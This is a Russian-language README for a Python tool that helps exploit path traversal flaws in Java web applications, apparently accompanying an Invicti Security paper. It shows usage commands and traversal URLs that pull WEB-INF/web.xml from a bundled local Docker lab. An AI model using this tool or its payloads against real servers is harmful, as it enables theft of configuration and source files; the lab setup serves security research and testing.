
Инструмент для помощи в эксплуатации уязвимостей обхода пути в Java веб-приложениях
Инструмент для помощи в эксплуатации уязвимостей обхода пути в Java веб-приложениях.
Этот инструмент упоминается в техническом документе Invicti Security Эксплуатация уязвимостей обхода пути в Java веб-приложениях.
Для работы этого инструмента требуется Python3.
Выполните следующую команду:
pip install -r requirements.txt
После установки передайте URL эксплойта следующим образом:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
Результаты (загруженные файлы) доступны в папке results.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
В папке docker предоставлено веб-приложение, уязвимое к обходу пути.
Для запуска перейдите в папку docker и выполните:
docker-compose up
Приложение доступно по адресу http://127.0.0.1:8082/vulnerable/.
Чтобы воспользоваться уязвимостью обхода пути, посетите: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml